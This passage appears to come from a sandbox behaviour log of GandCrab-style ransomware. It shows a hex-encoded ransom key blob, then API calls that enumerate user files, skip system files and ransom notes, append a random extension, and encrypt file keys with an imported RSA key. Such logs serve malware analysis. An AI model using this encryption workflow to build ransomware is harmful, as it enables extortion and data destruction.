x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0095.461] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0095.462] CloseHandle (hObject=0x2bc) returned 1 [0095.462] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.463] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.463] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x28, wMilliseconds=0x30b)) [0095.463] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.463] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.463] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.463] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\d2ca4a09d2ca4deb61a.lock") returned 102 [0095.463] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0095.464] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.464] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.464] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\") returned 78 [0095.465] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\*" [0095.465] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503278 [0095.465] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.465] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.465] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.465] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.465] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.465] lstrcmpW (lpString1="1m--rBjd9UI99dS.swf", lpString2=".") returned 1 [0095.465] lstrcmpW (lpString1="1m--rBjd9UI99dS.swf", lpString2="..") returned 1 [0095.465] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\", lpString2="1m--rBjd9UI99dS.swf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\1m--rBjd9UI99dS.swf") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\1m--rBjd9UI99dS.swf" [0095.465] lstrlenW (lpString=".titwmvjl") returned 9 [0095.465] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\1m--rBjd9UI99dS.swf") returned 97 [0095.465] VirtualAlloc (lpAddress=0x0, dwSize=0x102, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.466] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\1m--rBjd9UI99dS.swf.titwmvjl") returned 106 [0095.466] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\1m--rBjd9UI99dS.swf") returned 97 [0095.466] lstrlenW (lpString=".swf") returned 4 [0095.466] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.466] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".swf ") returned 5 [0095.466] lstrcmpiW (lpString1=".swf", lpString2=".titwmvjl") returned -1 [0095.466] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.466] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\1m--rBjd9UI99dS.swf") returned 97 [0095.466] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\1m--rBjd9UI99dS.swf") returned 97 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="desktop.ini") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="autorun.inf") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="ntuser.dat") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="iconcache.db") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="bootsect.bak") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="boot.ini") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="ntuser.dat.log") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="thumbs.db") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="KRAB-DECRYPT.html") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="CRAB-DECRYPT.html") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="KRAB-DECRYPT.txt") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="CRAB-DECRYPT.txt") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="ntldr") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="NTDETECT.COM") returned -1 [0095.466] lstrcmpiW (lpString1="1m--rBjd9UI99dS.swf", lpString2="Bootfont.bin") returned -1 [0095.466] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\1m--rBjd9UI99dS.swf") returned 97 [0095.466] lstrlenW (lpString=".swf") returned 4 [0095.466] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.467] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".swf ") returned 5 [0095.467] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.467] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0095.467] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\1m--rBjd9UI99dS.swf" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\1m--rbjd9ui99ds.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0095.467] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.468] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0095.468] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.468] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.469] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.469] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.469] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.469] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0095.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.469] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.469] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.470] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0095.470] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0095.470] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0095.470] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0095.470] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0095.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.470] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.470] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.471] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.471] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5034f8) returned 1 [0095.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.471] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.472] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.472] GetLastError () returned 0x0 [0095.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.472] CryptDestroyKey (hKey=0x5034f8) returned 1 [0095.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.472] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.472] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.473] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5037f8) returned 1 [0095.474] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.474] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, 